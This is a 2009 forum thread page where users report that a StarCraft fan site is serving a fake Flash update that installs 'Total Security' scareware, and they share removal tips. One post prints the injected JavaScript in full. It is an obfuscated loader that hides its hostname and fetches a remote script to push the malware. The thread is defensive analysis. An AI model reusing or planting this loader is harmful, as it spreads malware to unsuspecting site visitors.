• Log InLog In
  • Register
Liquid`
Team Liquid Liquipedia
EDT 00:40
CEST 06:40
KST 13:40
  • Home
  • Forum
  • Calendar
  • Streams
  • Liquipedia
  • Features
  • Store
  • EPT
  • TL+
  • StarCraft 2
  • Brood War
  • Smash
  • Heroes
  • Counter-Strike
  • Overwatch
  • Liquibet
  • Fantasy StarCraft
  • TLPD
  • StarCraft 2
  • Brood War
  • Blogs
Forum Sidebar
Events/Features
News
Featured News
Serral wins Maestros of the Game 213ByuL, and the Limitations of Standard Play3Team Liquid Map Contest #22: Results and Winners7Code S Season 2 (2026): RO4 and Finals Preview12TL.net Map Contest #22 - Voting & Ladder Map Selection7
Community News
MC vs IdrA, Boxer vs Nal_rA to be Legacy Matches @ BlizzCon315.0.16 Hotfix (June 30) - Balance + Bug Fixes36Weekly Cups (June 22-28): Zergs thrive in new patch5[TLMC] Summer 2026 Ladder Map Rotation05.0.16 patch for SC2 goes live (8 worker start)99
StarCraft 2
General
How to Block Australia, Brazil, Singapore Servers Server Blocker 5.0.16 Hotfix (June 30) - Balance + Bug Fixes Serral wins Maestros of the Game 2 Weekly Cups (June 22-28): Zergs thrive in new patch
Tourneys
Vespene Cup #1 — $300+ USD, July 10 HomeStory Cup 29 Douyu Cup 2026: $20,000 Legends Event (June 26-28) Crank Gathers Season 4: BW vs SC2 Team League RSL Revival: Season 6 - Qualifiers and Main Event
Strategy
[G] Having the right mentality to improve
Custom Maps
New Map Maker - Looking for Advice - Love or Hate Work In Progress Melee Maps [D]RTS in all its shapes and glory <3
External Content
The PondCast: SC2 News & Results Mutation # 532 Nuclear Family Mutation # 531 Experimental Artillery Mutation # 530 One For All
Brood War
General
Farewell Beloved Starcraft (Youtube Videos) BW General Discussion FlaShFTW vs A.Alm Grudge Match Event BGH Auto Balance -> http://bghmmr.eu/ ASL 22 Proposed Map Pool
Tourneys
Escore Tournament StarCraft Season 2 The Casual Games of the Week Thread [Megathread] Daily Proleagues [ASL21] Grand Finals
Strategy
Simple Questions, Simple Answers Creating a full chart of Zerg builds Relatively freeroll strategies Why doesn't anyone use restoration?
Other Games
General Games
Stormgate/Frost Giant Megathread Nintendo Switch Thread Dawn of War IV Summer Games Done Quick 2026! ZeroSpace at Steam NextFest - Last free demo
Dota 2
Looking for a Dota Mentor Official 'what is Dota anymore' discussion
League of Legends
Heroes of the Storm
Simple Questions, Simple Answers Heroes of the Storm 2.0
Hearthstone
Deck construction bug
TL Mafia
NeO.D_StephenKing vs This Guy From 1 Million Dance TL Mafia Community Thread TL Mafia Power Rank Vanilla Mini Mafia
Community
General
US Politics Mega-thread Russo-Ukrainian War Thread Canadian Politics Mega-thread The Games Industry And ATVI Men's Fashion Thread
Fan Clubs
The HerO Fan Club! The herO Fan Club!
Media & Entertainment
Movie Discussion! Series you have seen recently... [Req][Books] Good Fantasy/SciFi books [TV/BOOK] *SPOILERS* Game of Thrones Discussion
Sports
2024 - 2026 Football Thread McBoner: A hockey love story Formula 1 Discussion TeamLiquid Health and Fitness Initiative For 2023 Cricket [SPORT]
World Cup 2022
Tech Support
How to clean a TTe Thermaltake keyboard? Computer Build, Upgrade & Buying Resource Thread
TL Community
The Automated Ban List
Blogs
Listen To The Coaches!
TrAiDoS
An Exploration of th…
waywardstrategy
I'm an arrogant trash talke…
FlaShFTW
Gauntlet SC2: A Retrospectiv…
Ctone23
ramps on octagon
StaticNine
Funny Nicknames
LUCKY_NOOB
Evil Gacha Games and the…
ffswowsucks
Customize Sidebar...

Website Feedback

Closed Threads



Active: 28060 users

ScForAll unsafe... - Page 3

Forum Index > BW General
Post a Reply
Prev 1 2 3 4 5 Next All
ghermination
Profile Blog Joined April 2008
United States2851 Posts
Last Edited: 2009-09-26 22:17:38
September 26 2009 22:12 GMT
#41
I visited earlier, ignored the attack site warnings. I didn't download anything because i'm not retarded but that didn't seem to spontanteously get me a virus so it seems one could still surf the site as long as they don't download anything.

http://www.scforall.com/news/news02.asp?mNum=n03&PageNo=1&where=&query=&sterm=&articleNum=644

While reading the "there is nothing wrong with the site" news post, i noticed this:

+ Show Spoiler +

Is this still not a sign that SCForAll is not being hacked? At the very least, please investigate why your Russian friends are able to easily edit /include/bottom.asp to include their nifty javscript code that loads an external javascript file that, in turn, loads the popup offering the malware download. Heck, also investigate why I was able to edit this news info! So please for the sake of your users and fellow Starcraft fans at least truly investigate stuff first before saying nothing is wrong.


apparently there are quite a few gaping security holes in scforall.com
U Gotta Skate.
Amarxist
Profile Blog Joined July 2008
United States371 Posts
September 26 2009 22:51 GMT
#42
I'm glad I run flash-block and no-script. I only allow javascript to run based on a whitelist. Anything new that comes up just doesn't run at all.
☺ ☻
piratebay
Profile Blog Joined April 2009
United States399 Posts
September 26 2009 22:55 GMT
#43
this just proves that TL is a better sight than scforall~~ haha

on a more serious note, i shall d/l the file to spite my university~
Rebuke[SkyNet]
Profile Joined September 2009
18 Posts
September 26 2009 23:01 GMT
#44
this site is def. not secure to visit yet, just letting you guys know. this has come to my attention about 3 months ago and ever since then i never touched the website, artosis/whoever need to take action asap. my computer won't even let me go to the site because its so dangerous
Cocaine isn't a habit, its a lifestyle.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 26 2009 23:47 GMT
#45
Glad I'm not the only one who had this problem. If you get the Total Security 2009 bullshit I got, you can just rename taskmgr.exe in system32 to iexplore.exe(the only program you can open) and end the task and then remove the virus.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
OmniKnight
Profile Joined August 2008
United States73 Posts
September 27 2009 00:05 GMT
#46
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it
sashkata
Profile Joined September 2008
Bulgaria3241 Posts
September 27 2009 00:10 GMT
#47
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.
Foucault
Profile Blog Joined May 2009
Sweden2826 Posts
September 27 2009 00:14 GMT
#48
Yeah I don't really trust scforall right now either. I had some weird virus thing pop up on that site, like it was hi-jacked or something
I know that deep inside of you there's a humongous set of testicles just waiting to pop out. Let 'em pop bro. //////////////////// AKA JensOfSweden // Lee Yoon Yeol forever.
KizZBG
Profile Blog Joined November 2006
u gotta skate8152 Posts
September 27 2009 00:20 GMT
#49
Similar thing happened to me the other day where I was asked to download some .pdf or something which I just ignored. Thankfully it didn't to anything to my system lol.

On September 27 2009 04:47 SonuvBob wrote:
Show nested quote +
On September 27 2009 04:31 Deleriux wrote:
Please fix this. If you dont believe me open the page source yourself and you'll see the javascript.

Yeah, Artosis is away at WCG USA though. Don't know anyone else behind scforall.

PuertoRican?
eSTRO for life | #2 Sea.Really fan! | #1 GosI[Flying] fan! | Clide - best SC2 terran!
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 01:27 GMT
#50
Website is 100% infected. Confirmed using Virtual Machine.

The code below executes a javascript command to create the "flash box" users are seeing. The first part of the code uses Cookies to only show the box on first entrance. Those of you who have been to the site, ignored the box and come back later to see if its still infected; will not see it if your cookies are enabled.

Upon allowing the website to install the "flash update" i noted 2 processes running. A long number stream under administrator using about 20k of mem and install_flash_player.exe

After a restart of the system, i have the very common "Total Security" fraudtool. http://www.bleepingcomputer.com/virus-removal/remove-total-security

Code:
+ Show Spoiler +

<script>function GetCookieVal (offset) { var endstr = document.cookie.indexOf (';', offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + '='; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookieVal (j); i = document.cookie.indexOf(' ', i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + '=' + escape (value) + ((expires == null) ? '' : ('; expires=' + expires.toGMTString())) + ((path == null) ? '' : ('; path=' + path)) + ((domain == null) ? '' : ('; domain=' + domain)) + ((secure == true) ? '; secure' : ''); } if (GetCookie('x') == null) { var FoginosoteFalqe = 'ODYFYQZYNMxCMACTFBaEQXEYpGZFCNCWsKCEDYQLeFKSaKQHCFAKKQrDNOGcUOOQVhYWBSMKQQI.TXNOEOcVUZoNATm'.replace(/[A-Z]/g,''); var StudaliKqanuwupo = document.createElement('script'); StudaliKqanuwupo.src = 'http://' + FoginosoteFalqe + '/counter/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(StudaliKqanuwupo); var JzatuveYeput = new Date (); JzatuveYeput.setTime(JzatuveYeput.getTime() + (8*3600*1000)); SetCookie('x','1',JzatuveYeput, '/'); }</script>


Now, ScForAll aren't doing this on purpose, this is actually becoming one of the more common methods of malware dispersal through the internet. The infectious code is a little more advanced than the 1px by 1px iframes used by other fraudtools.


----

Contrary to what i read from other people, do not turn off your AV to use the website. Keep it up to date, when your AV blocks the attack; double-click the blue header and the frame is gone.
When you do something right, people wont notice youve done anything at all.
Manifesto7
Profile Blog Joined November 2002
Osaka27174 Posts
September 27 2009 01:43 GMT
#51
I blame this on the LastShadow interview.
ModeratorGodfather
Nytefish
Profile Blog Joined December 2007
United Kingdom4282 Posts
Last Edited: 2009-09-27 01:49:07
September 27 2009 01:48 GMT
#52
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


I avoided it because I was too lazy to get an update.
It's not that stupid to fall for something that looks like a flash player update.
No I'm never serious.
DrTJEckleburg
Profile Blog Joined February 2009
United States1080 Posts
September 27 2009 02:12 GMT
#53
On September 27 2009 09:05 OmniKnight wrote:
Just simply reload the page and it'll go away .. you'd have to be the dumbest person in the world to actually click it


Next time I'll use repel.
Im pretty good at whistling with my hands, especially when Im holding a whistle.
Tsagacity
Profile Blog Joined August 2005
United States2124 Posts
September 27 2009 02:13 GMT
#54
Wow. Now when I visit this site firefox gives me a preload page warning me that it's an attack site :O
"Everyone worse than me at video games is a noob. Everyone better than me doesn't have a life."
Catch]22
Profile Blog Joined July 2009
Sweden2683 Posts
Last Edited: 2009-09-27 02:15:11
September 27 2009 02:13 GMT
#55
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site
aKshun
Profile Joined March 2009
Australia18 Posts
September 27 2009 02:26 GMT
#56
so how do I check if I got infected, and how do i treat it?


Most obvious is that you will have a massive "fake antivirus" tool saying your infected with a bazillion malware that don't exist.

Restart your computer to confirm the above. If you are infected, if possible use an alternative PC to download Malwarebytes.org; rename the installer and then use it.
When you do something right, people wont notice youve done anything at all.
SpiritWolf
Profile Joined July 2008
United States127 Posts
Last Edited: 2009-09-27 02:27:13
September 27 2009 02:26 GMT
#57
On September 27 2009 11:13 Catch]22 wrote:
so how do I check if I got infected, and how do i treat it?

edit: also, since when did this begin? chrome warned me from the very first time i entered the site


I was stupid enough to click the link. If you were infected you would know. I it is a fake anti-spyware program called total security. Malwarebytes was able to kill it but not before it edited my hosts.txt to block every major search engine.
Initial_H.C.
Profile Blog Joined September 2008
Canada560 Posts
September 27 2009 03:10 GMT
#58
On September 27 2009 09:10 sashkata wrote:
To anyone who had that Total security 2009 thing I sugest checking your C:\WINDOWS\system32\drivers\etc hosts file. It's probably full of stuff like "127.0.0.2 google.com" It prevents you from acsesing google, yahoo search and some more search engines. Delete those lines (it will probably be everything in the file) and will be fixed.


Thanks for the suggestion. I was wondering why I couldn't get into all the search engines and had no idea how to fix it.
JohnColtrane
Profile Blog Joined July 2008
Australia4813 Posts
September 27 2009 03:14 GMT
#59
Do we know when this virii shit started happening on SCforall? because ive been on their site a little while ago and never got any fake adobe updates (or real adobe updates for that matter.)

i'm pretty sure it was within september
HEY MEYT
R1CH
Profile Blog Joined May 2007
Netherlands10342 Posts
Last Edited: 2009-09-27 03:25:49
September 27 2009 03:21 GMT
#60
It's always been happening, check the site history. That's what happens when you depend on too many remote includes (or have exploits in your site).

Google reported badware activity on www.scforall.com/ between Sep 24th 2009 and Sep 24th 2009
Google reported badware activity on scforall.com/forums/ on Mar 5th 2009
Google reported badware activity on scforall.com/news/ on Mar 5th 2009
Google reported badware activity on scforall.com/prog/ on Mar 5th 2009
Google reported badware activity on www.scforall.com/prog/ on Mar 4th 2009
Google reported badware activity on www.scforall.com/news/ on Mar 3rd 2009
Google reported badware activity on www.scforall.com/forums/ on Aug 27th 2008
AdministratorTwitter: @R1CH_TL
TL+ Member
Prev 1 2 3 4 5 Next All
Please log in or register to reply.
Live Events Refresh
Replay Cast
00:00
Crank Gathers S4: Qualifiers
LiquipediaDiscussion
[ Submit Event ]
Live Streams
Refresh
StarCraft 2
RuFF_SC2 215
ProTech134
StarCraft: Brood War
Britney 12262
Leta 84
Bale 34
Dota 2
LuMiX1
League of Legends
Doublelift4096
JimRising 835
Counter-Strike
minikerr19
Other Games
summit1g4256
WinterStarcraft450
C9.Mang0382
ViBE228
Organizations
Dota 2
PGL Dota 2 - Main Stream150
StarCraft 2
Blizzard YouTube
StarCraft: Brood War
BSLTrovo
[ Show 12 non-featured ]
StarCraft 2
• AfreecaTV YouTube
• intothetv
• Kozan
• IndyKCrew
• LaughNgamezSOOP
• Migwel
• sooper7s
StarCraft: Brood War
• BSLYoutube
• STPLYoutube
• ZZZeroYoutube
League of Legends
• Jankos960
• Stunt326
Upcoming Events
HomeStory Cup
6h 20m
Replay Cast
19h 20m
HomeStory Cup
1d 6h
OSC
1d 8h
WardiTV Weekly
3 days
The PondCast
4 days
Replay Cast
5 days
CrankTV Team League
5 days
Replay Cast
5 days
CrankTV Team League
6 days
[ Show More ]
Replay Cast
6 days
Liquipedia Results

Completed

Escore Tournament S3: W1
Douyu Cup 2026
Murky Cup 2026

Ongoing

IPSL Spring 2026
Acropolis #4
CSL Season 21: Qualifier 2
SCTL 2026 Spring
HSC XXIX
XSE Pro League 2026
IEM Cologne Major 2026
Stake Ranked Episode 2
CS Asia Championships 2026
Asian Champions League 2026
IEM Atlanta 2026
PGL Astana 2026
BLAST Rivals Spring 2026

Upcoming

CSL 2026 Summer (S21)
Escore Tournament S3: W2
ASL Season 22:Wild Card Qualifier
CSLAN 4
Blizzard Classic Cup 2026
SC4ALL II: StarCraft II
Kung Fu Cup 2026 Grand Finals
RSL Revival: Season 6
CranK Gathers Season 4: BW vs SC2 Team League
Light Tournament 2026
Eternal Conflict S2 Finale
Eternal Conflict S2 E3
Eternal Conflict S2 E2
Heroes Pulsing #3
Eternal Conflict S2 E1
FISSURE Playground #5
BLAST Open Fall 2026
Esports World Cup 2026
BLAST Bounty Summer 2026
BLAST Bounty Summer Qual
Stake Ranked Episode 3
TLPD

1. ByuN
2. TY
3. Dark
4. Solar
5. Stats
6. Nerchio
7. sOs
8. soO
9. INnoVation
10. Elazer
1. Rain
2. Flash
3. EffOrt
4. Last
5. Bisu
6. Soulkey
7. Mini
8. Sharp
Sidebar Settings...

Advertising | Privacy Policy | Terms Of Use | Contact Us

Original banner artwork: Jim Warren
The contents of this webpage are copyright © 2026 TLnet. All Rights Reserved.